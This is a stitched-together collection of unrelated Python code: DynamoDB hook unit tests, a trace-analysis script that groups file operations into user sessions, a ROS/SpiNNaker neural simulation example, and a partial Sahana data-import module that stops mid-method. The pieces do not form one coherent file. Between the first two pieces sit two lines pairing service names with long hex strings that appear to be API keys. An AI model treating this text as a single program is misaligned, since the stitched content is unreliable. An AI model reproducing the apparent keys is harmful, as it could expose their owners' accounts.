        super(TestHooks, self).tearDown()
        # Drain every hook list so hooks never leak across tests.
        for hooks in self.dynamo._hooks.values():
            while hooks:
                hooks.pop()

    def test_precall(self):
        """precall hooks are called before an API call"""
        hook = MagicMock()
        self.dynamo.subscribe("precall", hook)

        def throw(**_):
            """Throw an exception to terminate the request"""
            raise Exception()

        # The API call itself fails, but the precall hook must already have run.
        with patch.object(self.dynamo, "client") as client:
            client.describe_table.side_effect = throw
            with self.assertRaises(Exception):
                self.dynamo.describe_table("foobar")
        hook.assert_called_with(self.dynamo, "describe_table", {"TableName": "foobar"})

    def test_postcall(self):
        """postcall hooks are called after API call"""
        hash_key = DynamoKey("id")
        self.dynamo.create_table("foobar", hash_key=hash_key)
        calls = []

        def hook(*args):
            """Log the call into a list"""
            calls.append(args)

        self.dynamo.subscribe("postcall", hook)
        self.dynamo.describe_table("foobar")
        self.assertEqual(len(calls), 1)
        args = calls[0]
        # Hook signature: (connection, command, kwargs, response).
        self.assertEqual(len(args), 4)
        conn, command, kwargs, response = args
        self.assertEqual(conn, self.dynamo)
        self.assertEqual(command, "describe_table")
        self.assertEqual(kwargs["TableName"], "foobar")
        self.assertEqual(response["Table"]["TableName"], "foobar")

    def test_capacity(self):
        """capacity hooks are called whenever response has ConsumedCapacity"""
        hash_key = DynamoKey("id")
        self.dynamo.create_table("foobar", hash_key=hash_key)
        hook = MagicMock()
        self.dynamo.subscribe("capacity", hook)
        with patch.object(self.dynamo, "client") as client:
            client.scan.return_value = {
                "Items": [],
                "ConsumedCapacity": {
                    "TableName": "foobar",
                    "ReadCapacityUnits": 4,
                },
            }
            rs = self.dynamo.scan("foobar")
            list(rs)
        cap = ConsumedCapacity("foobar", Capacity(4, 0))
        hook.assert_called_with(self.dynamo, "scan", ANY, ANY, cap)

    def test_subscribe(self):
        """Can subscribe and unsubscribe from hooks"""
        hook = lambda: None
        self.dynamo.subscribe("precall", hook)
        self.assertEqual(len(self.dynamo._hooks["precall"]), 1)
        self.dynamo.unsubscribe("precall", hook)
        self.assertEqual(len(self.dynamo._hooks["precall"]), 0)

Alchemy sentiment analysis: fb12d2c55fff36e1e268584e261b6b010b37279f



Africa Is Talking: 676dbd926bbb04fa69ce90ee81d3f5ffee2692aaf80eb5793bd70fe93e77dc2e

#!/usr/bin/env python3
"""
    Categorize and analyze user sessions.
    Read in ecfs_obfuscated_filtered.gz file, output some fancy results. 
"""

from collections import defaultdict
from collections import Counter
import sys
import time
import os
import resource
import json
import fnmatch
from pipes import Pipes
import operator

from operation import Operation

# Byte-size units (powers of 1024).
KB = 1024
MB = KB * 1024
GB = MB * 1024
TB = GB * 1024
PB = TB * 1024

# Progress-reporting interval in input lines — presumably used by the driver
# that streams the trace file; not referenced in this chunk, confirm usage.
MONITOR_LINES = 100000


class UserSession():
    """Accumulates per-user operation statistics for one session window.

    Operations are fed in timestamp order via add_op(); finish() computes
    derived metrics and serializes the session as a ';'-joined CSV row.
    """

    def __init__(self, user_id):
        self.user_id = user_id
        self.from_ts = 0            # timestamp of first op in the session
        self.till_ts = 0            # end time of the latest op (ts + execution_time)
        self.get_requests = 0
        self.reget_requests = 0     # re-retrievals of the same object (set in finish())
        self.put_requests = 0
        self.get_bytes = 0
        self.put_bytes = 0
        self.rename_requests = 0
        self.del_requests = 0
        self.get_dirs = 0           # distinct dirs read from (set in finish())
        self.put_dirs = 0           # distinct dirs written to (set in finish())
        self.put_files_per_dir = 0.0
        self.get_files_per_dir = 0.0
        self.window_seconds = 0     # session-gap threshold, assigned by the caller

        # Per-object / per-directory access counters.
        self.file_cnt_gets = Counter()
        self.file_cnt_puts = Counter()
        self.dir_cnt_gets = Counter()
        self.dir_cnt_puts = Counter()

        self.num_ops = 0
        self.last_ts = 0

    def add_op(self, op):
        """Fold one Operation into the session; ops must arrive in ts order."""
        self.num_ops += 1

        # Enforce monotonically non-decreasing timestamps.
        if op.ts < self.last_ts:
            raise Exception("Timestamp too old")
        else:
            self.last_ts = op.ts

        # Dispatch on operation type: get / put / delete / rename.
        if op.optype == 'g':
            self.get_requests += 1
            self.get_bytes += op.size
            self.file_cnt_gets[op.obj_id] += 1
            self.dir_cnt_gets[op.parent_dir_id] += 1
        elif op.optype == 'p':
            self.put_requests += 1
            self.put_bytes += op.size
            self.file_cnt_puts[op.obj_id] += 1
            self.dir_cnt_puts[op.parent_dir_id] += 1
        elif op.optype == 'd':
            self.del_requests += 1
        elif op.optype == 'r':
            self.rename_requests += 1

        #update last time stamp in the session
        self.till_ts = op.ts + op.execution_time

    def finish(self):
        """Compute derived metrics and return the session as a ';'-joined row."""
        self.get_dirs = len(self.dir_cnt_gets)
        if self.get_dirs > 0:
            self.get_files_per_dir = float(self.get_requests) / self.get_dirs

        self.put_dirs = len(self.dir_cnt_puts)
        if self.put_dirs > 0:
            self.put_files_per_dir = float(self.put_requests) / self.put_dirs

        """
        set reget_counter
        :param counter: contains [ 1, 1, 5] counts of objects. value > 1 is a re-retrieval.
        :return:
        """
        # Every access beyond the first to the same object is a re-get.
        for c in self.file_cnt_gets.values():
            if c > 1:
                self.reget_requests += (c - 1)

        # self.announce()

        # Field order must stay in sync with the downstream CSV consumer.
        return ";".join([str(x) for x in [
        self.user_id,
        self.from_ts,
        self.till_ts,
        self.till_ts - self.from_ts,
        self.get_requests,
        self.reget_requests,
        self.put_requests,
        self.get_bytes,
        self.put_bytes,
        self.rename_requests,
        self.del_requests,
        self.get_dirs,
        self.put_dirs,
        self.put_files_per_dir,
        self.get_files_per_dir,
        self.window_seconds
        ]]
        )


    def announce(self):
        """Print a one-line human-readable summary of the closed session."""
        print("closed session. gets: %r, regets: %r, puts: %r, dels: %r, renames: %r get_dirs: %r, put_dirs: %r, get_bytes: %r put_bytes: %r window_seconds: %d" % \
              (self.get_requests, self.reget_requests, self.put_requests, self.del_requests, self.rename_requests, self.get_dirs, self.put_dirs, self.get_bytes, self.put_bytes, self.window_seconds))


def find_clusters(atimes):
    """Choose a session-window length (seconds) for a list of access times.

    Tries gap thresholds from 120 s to 3650 s in 10 s steps, counts the
    clusters each threshold yields, and returns the smallest threshold that
    produced the most frequently occurring cluster count.
    """
    size_votes = Counter()   # cluster-count -> how many thresholds produced it
    first_seen = dict()      # cluster-count -> smallest threshold producing it
    # BUGFIX: xrange() does not exist on Python 3 (this file's shebang is
    # python3); use range() instead.
    for gap in range(120, 3660, 10):
        clusters = get_clusters(atimes, gap)
        cs = len(clusters)
        size_votes[cs] += 1

        # note first occurrence of this cluster size.
        if cs not in first_seen:
            first_seen[cs] = gap
        # print(len(atimes), gap, cs)

    return first_seen[size_votes.most_common()[0][0]]

def get_clusters(data, maxgap):
    '''Arrange data into groups where successive elements
       differ by no more than *maxgap*.

       Note: sorts *data* in place before grouping.

        >>> get_clusters([1, 6, 9, 100, 102, 105, 109, 134, 139], maxgap=10)
        [[1, 6, 9], [100, 102, 105, 109], [134, 139]]

        >>> get_clusters([1, 6, 9, 99, 100, 102, 105, 134, 139, 141], maxgap=10)
        [[1, 6, 9], [99, 100, 102, 105], [134, 139, 141]]
    '''
    # BUGFIX: the original raised IndexError (data[0]) on an empty input.
    if not data:
        return []
    data.sort()
    groups = [[data[0]]]
    for x in data[1:]:
        # Extend the current group while the gap stays within maxgap,
        # otherwise start a new group.
        if abs(x - groups[-1][-1]) <= maxgap:
            groups[-1].append(x)
        else:
            groups.append([x])
    return groups


def analyze_user_session(user_session_file, out_pipeline, target_file_name):
    """Split one user's operations into sessions and archive them as CSV.

    Reads all operations from *user_session_file*, detects the inactivity
    window via find_clusters(), then walks the operations in timestamp
    order: whenever the gap to the previous session end exceeds the window,
    the current session is finished and written to *target_file_name*
    through *out_pipeline*, and a fresh session is started.
    """
    with open(user_session_file, 'r') as handle:
        operations = []
        access_times = []

        for raw_line in handle:
            record = Operation()
            record.init(raw_line.strip())
            operations.append(record)
            access_times.append(record.ts)

        operations.sort(key=operator.attrgetter('ts'))
        access_times.sort()
        window_seconds = find_clusters(access_times)

        # user id is the filename with the fixed suffix stripped
        basename = os.path.basename(user_session_file)
        user_id = basename[:basename.find(".user_session.csv")]

        session_counter = 1
        session = UserSession(user_id)
        session.window_seconds = window_seconds

        for record in operations:
            if session.from_ts == 0:
                # first operation of a fresh session defines its bounds
                session.from_ts = record.ts
                session.till_ts = record.ts + record.execution_time

            if (session.till_ts + window_seconds) < record.ts:
                # inactivity gap exceeded: archive this session, start anew
                out_pipeline.write_to(target_file_name, session.finish())
                del session
                session = UserSession(user_id)
                session.window_seconds = window_seconds
                session_counter += 1

            session.add_op(record)

        # flush the trailing (still open) session, if it saw any ops
        if session.num_ops > 0:
            out_pipeline.write_to(target_file_name, session.finish())

        print("sessions: %d with window_seconds: %d" %(session_counter, window_seconds))


if __name__ == "__main__":
    # CLI: argv[1] = directory of *.user_session.csv files, argv[2] = result file
    source_dir = os.path.abspath(sys.argv[1])

    result = os.path.abspath(sys.argv[2])
    results_dir = os.path.dirname(result)
    target_file_name = os.path.basename(result)

    # Collect every per-user session file below source_dir.
    users_session_files = []
    for dirpath, dirnames, files in os.walk(source_dir):
        for name in fnmatch.filter(files, '*.user_session.csv'):
            users_session_files.append(os.path.join(dirpath, name))

    # The out pipe is append-only, so drop any stale result file first.
    target_path = os.path.join(results_dir, target_file_name)
    if os.path.exists(target_path):
        os.remove(target_path)

    out_pipe = Pipes(results_dir)

    # Column order must match UserSession.finish()'s field order.
    csv_header = ";".join([
        "user_id", "from_ts", "till_ts", "session_lifetime",
        "get_requests", "reget_requests", "put_requests",
        "get_bytes", "put_bytes", "rename_requests", "del_requests",
        "get_dirs", "put_dirs", "put_files_per_dir", "get_files_per_dir",
        "window_seconds",
    ])

    out_pipe.write_to(target_file_name, csv_header)

    total = len(users_session_files)
    for cnt, sf in enumerate(users_session_files, start=1):
        print ("working on %d/%d" % (cnt, total))
        analyze_user_session(sf, out_pipe, target_file_name)

    out_pipe.close()

    print("wrote results to %s: " % (os.path.join(results_dir, target_file_name)))
    
    
#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
@author Stephan Reith
@date 	31.08.2016

This is a simple example to demonstrate how the ROS Spinnaker Interface can be used.

You will also need a ROS Listener and a ROS Talker to send and receive data.
Make sure they communicate over the same ROS topics and std_msgs.Int64 ROS Messages used in here.
"""

import spynnaker.pyNN as pynn

from ros_spinnaker_interface import ROS_Spinnaker_Interface
# import transfer_functions as tf
from ros_spinnaker_interface import SpikeSourcePoisson
from ros_spinnaker_interface import SpikeSinkSmoothing


ts = 0.1                 # simulation timestep (ms)
n_neurons = 1
simulation_time = 10000  # ms


# pyNN setup; delays must fall within [min_delay, max_delay]
pynn.setup(timestep=ts, min_delay=ts, max_delay=2.0*ts)


# Target population that receives injected spikes and is recorded below.
pop = pynn.Population(size=n_neurons, cellclass=pynn.IF_curr_exp, cellparams={}, label='pop')


# The ROS_Spinnaker_Interface just needs to be initialised. The following parameters are possible:
ros_interface = ROS_Spinnaker_Interface(
        n_neurons_source=n_neurons,                 # number of neurons of the injector population
        Spike_Source_Class=SpikeSourcePoisson,   # the transfer function ROS Input -> Spikes you want to use.
        Spike_Sink_Class=SpikeSinkSmoothing,     # the transfer function Spikes -> ROS Output you want to use.
                                                    # You can choose from the transfer_functions module
                                                    # or write one yourself.
        output_population=pop,                      # the pynn population you wish to receive the
                                                    # live spikes from.
        ros_topic_send='to_spinnaker',              # the ROS topic used for the incoming ROS values.
        ros_topic_recv='from_spinnaker',            # the ROS topic used for the outgoing ROS values.
        clk_rate=1000,                              # mainloop clock (update) rate in Hz.
        ros_output_rate=10)                         # number of ROS messages send out per second.

# Build your network, run the simulation and optionally record the spikes and voltages.
# The interface acts as the presynaptic population of this one-to-one projection.
pynn.Projection(ros_interface, pop, pynn.OneToOneConnector(weights=5, delays=1))


pop.record()      # record spikes
pop.record_v()    # record membrane voltage

pynn.run(simulation_time)

# getSpikes() returns (neuron_id, time) pairs -- see the unpacking below.
spikes = pop.getSpikes()

pynn.end()

# Plot
import pylab

spike_times = [spike[1] for spike in spikes]
spike_ids = [spike[0] for spike in spikes]

pylab.plot(spike_times, spike_ids, ".")
pylab.xlabel('Time (ms)')
pylab.ylabel('Neuron ID')
pylab.title('Spike Plot')
pylab.xlim(xmin=0)
pylab.show()

# -*- coding: utf-8 -*-

""" Resource Import Tools

    @copyright: 2011-12 (c) Sahana Software Foundation
    @license: MIT

    Permission is hereby granted, free of charge, to any person
    obtaining a copy of this software and associated documentation
    files (the "Software"), to deal in the Software without
    restriction, including without limitation the rights to use,
    copy, modify, merge, publish, distribute, sublicense, and/or sell
    copies of the Software, and to permit persons to whom the
    Software is furnished to do so, subject to the following
    conditions:

    The above copyright notice and this permission notice shall be
    included in all copies or substantial portions of the Software.

    THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
    EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
    OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
    NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
    HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
    WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
    FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
    OTHER DEALINGS IN THE SOFTWARE.
"""

# @todo: remove all interactive error reporting out of the _private methods, and raise exceptions instead.
__all__ = ["S3Importer", "S3ImportJob", "S3ImportItem"]

import os
import sys
import cPickle
import tempfile
from datetime import datetime
from copy import deepcopy
try:
    from cStringIO import StringIO    # Faster, where available
except:
    from StringIO import StringIO

try:
    from lxml import etree
except ImportError:
    print >> sys.stderr, "ERROR: lxml module needed for XML handling"
    raise

try:
    import json # try stdlib (Python 2.6)
except ImportError:
    try:
        import simplejson as json # try external module
    except:
        import gluon.contrib.simplejson as json # fallback to pure-Python module

from gluon import *
from gluon.serializers import json as jsons
from gluon.storage import Storage, Messages
from gluon.tools import callback

from s3utils import SQLTABLES3
from s3crud import S3CRUD
from s3xml import S3XML
from s3utils import s3_mark_required, s3_has_foreign_key, s3_get_foreign_key

# Module-level debug switch: when True, _debug() writes trace messages to
# stderr (Python 2 print-chevron syntax); when False it is a no-op, so call
# sites may invoke _debug() unconditionally.
DEBUG = False
if DEBUG:
    print >> sys.stderr, "S3IMPORTER: DEBUG MODE"
    def _debug(m):
        print >> sys.stderr, m
else:
    _debug = lambda m: None

# =============================================================================
class S3Importer(S3CRUD):
    """
        Transformable formats (XML, JSON, CSV) import handler
    """

    UPLOAD_TABLE_NAME = "s3_import_upload"

    # -------------------------------------------------------------------------
    def apply_method(self, r, **attr):
        """
            Apply CRUD methods

            @param r: the S3Request
            @param attr: dictionary of parameters for the method handler

            @returns: output object to send to the view

            Known means of communicating with this module:

            It expects a URL of the form: /prefix/name/import

            It will interpret the http requests as follows:

            GET     will trigger the upload
            POST    will trigger either commits or display the import details
            DELETE  will trigger deletes

            It will accept one of the following control vars:
            item:   to specify a single item in the import job
            job:    to specify a job
            It should not receive both so job takes precedent over item

            For CSV imports, the calling controller can add extra fields
            to the upload form to add columns to each row in the CSV. To add
            the extra fields, pass a named parameter "csv_extra_fields" to the
            s3_rest_controller call (or the S3Request call, respectively):

            s3_rest_controller(module, resourcename,
                               csv_extra_fields=[
                                    dict(label="ColumnLabelInTheCSV",
                                         field=field_instance)
                               ])

            The Field instance "field" will be added to the upload form, and
            the user input will be added to each row of the CSV under the
            label as specified. If the "field" validator has options, the
            input value will be translated into the option representation,
            otherwise the value will be used as-is.

            Note that the "label" in the dict is the column label in the CSV,
            whereas the field label for the form is to be set in the Field
            instance passed as "field".

            You can add any arbitrary number of csv_extra_fields to the list.

            Additionally, you may want to allow the user to choose whether
            the import shall first remove all existing data in the target
            table. To do so, pass a label for the "replace_option" to the
            request:

            s3_rest_controller(module, resourcename,
                               replace_option=T("Remove existing data before import"))

            This will add the respective checkbox to the upload form.

            You may also want to provide a link to download a CSV template from
            the upload form. To do that, add the resource name to the request
            attributes:

            s3_rest_controller(module, resourcename,
                               csv_template="<resourcename>")

            This will provide a link to:
                - static/formats/s3csv/<controller>/<resourcename>.csv
            at the top of the upload form.

        """

        _debug("S3Importer.apply_method(%s)" % r)

        # Messages
        T = current.T
        messages = self.messages = Messages(T)
        messages.download_template = "Download Template"
        messages.invalid_file_format = "Invalid File Format"
        messages.unsupported_file_type = "Unsupported file type of %s"
        messages.stylesheet_not_found = "No Stylesheet %s could be found to manage the import file."
        messages.no_file = "No file submitted"
        messages.file_open_error = "Unable to open the file %s"
        messages.file_not_found = "The file to upload is missing"
        messages.no_records_to_import = "No records to import"
        messages.no_job_to_delete = "No job to delete, maybe it has already been deleted."
        messages.title_job_read = "Details of the selected import job"
        messages.title_job_list = "List of import items"
        messages.file_uploaded = "Import file uploaded"
        messages.upload_submit_btn = "Upload Data File"
        messages.open_btn = "Open"
        messages.view_btn = "View"
        messages.delete_btn = "Delete"
        messages.item_show_details = "Display Details"
        messages.job_total_records = "Total records in the Import Job"
        messages.job_records_selected = "Records selected"
        messages.job_deleted = "Import job deleted"
        messages.job_completed = "Job run on %s. With result of (%s)"
        messages.import_file = "Import File"
        messages.import_file_comment = "Upload a file formatted according to the Template."
        messages.user_name = "User Name"
        messages.commit_total_records_imported = "%s records imported"
        messages.commit_total_records_ignored = "%s records ignored"
        messages.commit_total_errors = "%s records in error"

        # Fall back to a generic page title when the resource has no
        # title_upload CRUD string configured
        try:
            self.uploadTitle = current.response.s3.crud_strings[self.tablename].title_upload
        except:
            self.uploadTitle = T("Upload a %s import file" % r.function)

        # @todo: correct to switch this off for the whole session?
        current.session.s3.ocr_enabled = False

        # Reset all errors/warnings
        self.error = None
        self.warning = None

        # CSV upload configuration
        if "csv_stylesheet" in attr:
            self.csv_stylesheet = attr["csv_stylesheet"]
        else:
            self.csv_stylesheet = None
        self.csv_extra_fields = None
        self.csv_extra_data = None

        # Environment
        self.controller = r.controller
        self.function = r.function

        # Target table for the data import
        self.controller_resource = self.resource
        self.controller_table = self.table
        self.controller_tablename = self.tablename

        # Table for uploads
        self.__define_table()
        self.upload_resource = None
        self.item_resource = None

        # XSLT Path
        self.xslt_path = os.path.join(r.folder, r.XSLT_PATH)
        self.xslt_extension = r.XSLT_EXTENSION

        # Check authorization
        authorised = self.permit("create", self.upload_tablename) and \
                     self.permit("create", self.controller_tablename)
        if not authorised:
            if r.method is not None:
                r.unauthorised()
            else:
                return dict(form=None)

        # @todo: clean this up
        source = None
        transform = None
        upload_id = None
        items = None
        # @todo get the data from either get_vars or post_vars appropriately
        #       for post -> commit_items would need to add the uploadID
        if "transform" in r.get_vars:
            transform = r.get_vars["transform"]
        if "filename" in r.get_vars:
            source = r.get_vars["filename"]
        if "job" in r.post_vars:
            upload_id = r.post_vars["job"]
        elif "job" in r.get_vars:
            upload_id = r.get_vars["job"]
        items = self._process_item_list(upload_id, r.vars)
        if "delete" in r.get_vars:
            r.http = "DELETE"

        # If we have an upload ID, then get upload and import job
        self.upload_id = upload_id
        query = (self.upload_table.id == upload_id)
        self.upload_job = current.db(query).select(limitby=(0, 1)).first()
        if self.upload_job:
            self.job_id = self.upload_job.job_id
        else:
            self.job_id = None

        # Now branch off to the appropriate controller function
        # NOTE(review): in the GET branch, when "filename" was passed (source
        # set) but no job ID, the else-branch below calls upload() a second
        # time and overwrites the output built just above; the second "if"
        # looks like it was meant to be "elif" -- confirm before changing.
        if r.http == "GET":
            if source != None:
                self.commit(source, transform)
                output = self.upload(r, **attr)
            if upload_id != None:
                output = self.display_job(upload_id)
            else:
                output = self.upload(r, **attr)
        elif r.http == "POST":
            if items != None:
                output = self.commit_items(upload_id, items)
            else:
                output = self.generate_job(r, **attr)
        elif r.http == "DELETE":
            # NOTE(review): if upload_id is None here, "output" is never
            # assigned and the final return raises UnboundLocalError.
            if upload_id != None:
                output = self.delete_job(upload_id)
        else:
            r.error(405, current.manager.ERROR.BAD_METHOD)

        return output

    # -------------------------------------------------------------------------
    def upload(self, r, **attr):
        """
            Display the upload form together with the dataTable of
            previous import jobs.

            A submitted file leads to a "POST" (generate_job); opening an
            existing job leads to a "GET" with the job details, and the
            job's delete action triggers a "DELETE" method.
        """

        _debug("S3Importer.upload()")

        upload_form = self._upload_form(r, **attr)
        output = self._create_upload_dataTable()

        # dataTable AJAX callbacks only need the raw table data
        if self.request.representation == "aadata":
            return output

        output.update(form=upload_form, title=self.uploadTitle)
        return output

    # -------------------------------------------------------------------------
    def generate_job(self, r, **attr):
        """
            Generate an ImportJob from the submitted upload form

            @param r: the S3Request
            @param attr: parameters for the method handler

            Validates the uploaded file, stores controller/function/user
            metadata on the upload record, and runs a trial import via
            _generate_import_job(). With "single_pass" set, the job is
            committed immediately and the client is redirected.
        """

        _debug("S3Importer.display()")

        response = current.response
        s3 = response.s3

        db = current.db
        table = self.upload_table

        title=self.uploadTitle
        form = self._upload_form(r, **attr)

        # Re-bind r to self.request for the rest of this method
        r = self.request
        r.read_body()
        sfilename = form.vars.file
        try:
            ofilename = r.post_vars["file"].filename
        except:
            form.errors.file = self.messages.no_file

        if form.errors:
            response.flash = ""
            output = self._create_upload_dataTable()
            output.update(form=form, title=title)

        elif not sfilename or \
             ofilename not in r.files or r.files[ofilename] is None:
            response.flash = ""
            response.error = self.messages.file_not_found
            output = self._create_upload_dataTable()
            output.update(form=form, title=title)

        else:
            output = dict()
            # Record who uploaded what, keyed on the stored filename
            query = (table.file == sfilename)
            db(query).update(controller=self.controller,
                             function=self.function,
                             filename=ofilename,
                             user_id=current.session.auth.user.id)
            # must commit here to separate this transaction from
            # the trial import phase which will be rolled back.
            db.commit()

            # Only csv/xls are accepted; xls is converted to csv below
            extension = ofilename.rsplit(".", 1).pop()
            if extension not in ("csv", "xls"):
                response.flash = None
                response.error = self.messages.invalid_file_format
                return self.upload(r, **attr)

            upload_file = r.files[ofilename]
            if extension == "xls":
                if "xls_parser" in s3:
                    upload_file.seek(0)
                    upload_file = s3.xls_parser(upload_file.read())
                    extension = "csv"

            if upload_file is None:
                response.flash = None
                response.error = self.messages.file_not_found
                return self.upload(r, **attr)
            else:
                # Rewind so the trial import reads from the start
                upload_file.seek(0)

            row = db(query).select(table.id, limitby=(0, 1)).first()
            upload_id = row.id
            if "single_pass" in r.vars:
                single_pass = r.vars["single_pass"]
            else:
                single_pass = None
            self._generate_import_job(upload_id,
                                      upload_file,
                                      extension,
                                      commit_job = single_pass)
            # NOTE(review): upload_id was read from row.id above and is not
            # modified by _generate_import_job, so this error branch appears
            # unreachable unless row.id itself was None -- confirm intent.
            if upload_id is None:
                row = db(query).update(status = 2) # in error
                if self.error != None:
                    response.error = self.error
                if self.warning != None:
                    response.warning = self.warning
                response.flash = ""
                return self.upload(r, **attr)
            else:
                if single_pass:
                    current.session.flash = self.messages.file_uploaded
                    # For a single pass retain the vars from the original URL
                    next_URL = URL(r=self.request,
                                   f=self.function,
                                   args=["import"],
                                   vars=current.request.get_vars
                                  )
                    redirect(next_URL)
                s3.dataTable_vars = {"job" : upload_id}
                return self.display_job(upload_id)
        return output

    # -------------------------------------------------------------------------
    def display_job(self, upload_id):
        """
            Display the details (import items) of an import job.

            @param upload_id: the upload record ID

            Redirects back to the import start page when there is no job
            for this upload, or when the job has already completed.
        """

        _debug("S3Importer.display_job()")

        request = self.request
        response = current.response

        db = current.db
        table = self.upload_table
        job_id = self.job_id
        output = dict()
        if job_id == None:
            # redirect to the start page (removes all vars)
            query = (table.id == upload_id)
            row = db(query).update(status = 2) # in error
            current.session.warning = self.messages.no_records_to_import
            redirect(URL(r=request, f=self.function, args=["import"]))

        # Get the status of the upload job
        query = (table.id == upload_id)
        row = db(query).select(table.status,
                               table.modified_on,
                               table.summary_added,
                               table.summary_error,
                               table.summary_ignored,
                               limitby=(0, 1)).first()
        status = row.status
        # completed display details
        if status == 3: # Completed
            # @todo currently this is an unnecessary server call,
            #       change for completed records to be a display details
            #       and thus avoid the round trip.
            #       but keep this code to protect against hand-crafted URLs
            #       (and the 'go back' syndrome on the browser)
            result = (row.summary_added,
                      row.summary_error,
                      row.summary_ignored,
                     )
            self._display_completed_job(result, row.modified_on)
            redirect(URL(r=request, f=self.function, args=["import"]))
        # otherwise display import items
        response.view = self._view(request, "list.html")

        output = self._create_import_item_dataTable(upload_id, job_id)
        if request.representation == "aadata":
            return output

        if response.s3.error_report:
            error_report = "Errors|" + "|".join(response.s3.error_report)
            error_tip = A("All Errors",
                          _class="errortip",
                          _title=error_report)
        else:
            # @todo: restore the error tree from all items?
            error_tip = ""

        rowcount = len(self._get_all_items(upload_id))
        # NOTE(review): the element id "totalAvaliable" is misspelled but may
        # be referenced by client-side JS -- do not rename without checking.
        rheader = DIV(TABLE(
            TR(
                TH("%s: " % self.messages.job_total_records),
                TD(rowcount, _id="totalAvaliable"),
                TH("%s: " % self.messages.job_records_selected),
                TD(0, _id="totalSelected"),
                TH(error_tip)
              ),
        ))

        output["title"] = self.messages.title_job_read
        output["rheader"] = rheader
        output["subtitle"] = self.messages.title_job_list

        return output

    # -------------------------------------------------------------------------
    def commit(self, source, transform):
        """
            Import a file from disk in one step: create the upload record,
            generate the import job and commit all items.

            @param source: path of the file to import
            @param transform: the transform (stylesheet) to apply
        """

        _debug("S3Importer.commit(%s, %s)" % (source, transform))

        db = current.db
        session = current.session
        request = self.request

        # NOTE(review): openFile is never closed on the success path --
        # consider a try/finally or "with" once _generate_import_job's
        # consumption of the handle is confirmed.
        try:
            openFile = open(source, "r")
        except:
            session.error = self.messages.file_open_error % source
            redirect(URL(r=request, f=self.function))

        # @todo: manage different file formats
        # @todo: find file format from request.extension
        fileFormat = "csv"

        # insert data in the table and get the ID
        try:
            user = session.auth.user.id
        except:
            user = None

        upload_id = self.upload_table.insert(controller=self.controller,
                                             function=self.function,
                                             filename = source,
                                             user_id = user,
                                             status = 1)
        db.commit()

        # create the import job
        result = self._generate_import_job(upload_id,
                                           openFile,
                                           fileFormat,
                                           stylesheet=transform
                                          )
        if result == None:
            if self.error != None:
                if session.error == None:
                    session.error = self.error
                else:
                    session.error += self.error
            if self.warning != None:
                if session.warning == None:
                    session.warning = self.warning
                else:
                    session.warning += self.warning
        else:
            items = self._get_all_items(upload_id, True)
            # commit the import job
            self._commit_import_job(upload_id, items)
            result = self._update_upload_job(upload_id)

            # get the results and display
            # msg first combines the three "%s ..." message templates, then
            # the second % fills their placeholders from the result tuple
            msg = "%s : %s %s %s" % (source,
                                     self.messages.commit_total_records_imported,
                                     self.messages.commit_total_errors,
                                     self.messages.commit_total_records_ignored)
            msg = msg % result

            if session.flash == None:
                session.flash = msg
            else:
                session.flash += msg

        # @todo: return the upload_id?

    # -------------------------------------------------------------------------
    def commit_items(self, upload_id, items):
        """
            Commit the selected items of an import job, update the upload
            record and redirect back to the import start page.

            @param upload_id: the upload record ID
            @param items: the selected import item IDs
        """

        _debug("S3Importer.commit_items(%s, %s)" % (upload_id, items))

        # Write the selected import items into the database
        self._commit_import_job(upload_id, items)

        # Update the upload table:
        #   - change the status to completed
        #   - record the summary details
        #   - delete the upload file
        job_summary = self._update_upload_job(upload_id)

        # Flash the completion message, then redirect to the start page
        # (removes all vars)
        self._display_completed_job(job_summary)
        redirect(URL(r=self.request, f=self.function, args=["import"]))

    # -------------------------------------------------------------------------
    def delete_job(self, upload_id):
        """
            Delete an uploaded file and the corresponding import job

            @param upload_id: the upload ID
        """

        _debug("S3Importer.delete_job(%s)" % (upload_id))

        db = current.db
        request = self.request
        response = current.response

        # Delete the import job (if one was created for this upload)
        if self.job_id:
            # @todo: check result
            resource = request.resource # use self.resource?
            resource.import_xml(None,
                                id = None,
                                tree = None,
                                job_id = self.job_id,
                                delete_job = True)

        # now delete the upload entry
        deleted = db(self.upload_table.id == upload_id).delete()
        # @todo: check that the record has been deleted

        # Now commit the changes
        db.commit()

        # return to the main import screen
        # @todo: check result properly
        if deleted == False:
            response.warning = self.messages.no_job_to_delete
        else:
            response.flash = self.messages.job_deleted

        # redirect to the start page (remove all vars)
        self.next = self.request.url(vars=dict())
        return

    # ========================================================================
    # Utility methods
    # ========================================================================
    def _upload_form(self, r, **attr):
        """
            Create and process the upload form, including csv_extra_fields

            @param r: the S3Request
            @param attr: handler parameters (csv_extra_fields, csv_template,
                         replace_option)

            @returns: the upload FORM; on accept, also stores the upload
                      record and collects csv_extra_data for the import
        """

        EXTRA_FIELDS = "csv_extra_fields"
        TEMPLATE = "csv_template"
        REPLACE_OPTION = "replace_option"

        session = current.session
        response = current.response
        s3 = response.s3
        request = self.request
        table = self.upload_table

        formstyle = s3.crud.formstyle
        response.view = self._view(request, "list_create.html")

        # Optionally expose the "replace existing data" checkbox
        if REPLACE_OPTION in attr:
            replace_option = attr[REPLACE_OPTION]
            if replace_option is not None:
                table.replace_option.readable = True
                table.replace_option.writable = True
                table.replace_option.label = replace_option

        # NOTE(review): "or" binds looser than "and", so this reads as
        # readable or (writable and not compute) -- possibly
        # (readable or writable) and not compute was intended; confirm.
        fields = [f for f in table if f.readable or f.writable and not f.compute]
        if EXTRA_FIELDS in attr:
            extra_fields = attr[EXTRA_FIELDS]
            if extra_fields is not None:
                fields.extend([f["field"] for f in extra_fields if "field" in f])
            self.csv_extra_fields = extra_fields
        labels, required = s3_mark_required(fields)
        if required:
            s3.has_required = True

        form = SQLFORM.factory(table_name=self.UPLOAD_TABLE_NAME,
                               labels=labels,
                               formstyle=formstyle,
                               upload = os.path.join(request.folder, "uploads", "imports"),
                               separator = "",
                               message=self.messages.file_uploaded,
                               *fields)

        # Build the CSV template download link from the csv_template attr:
        # True -> <controller>/<function>.csv, a string -> <controller>/<name>.csv,
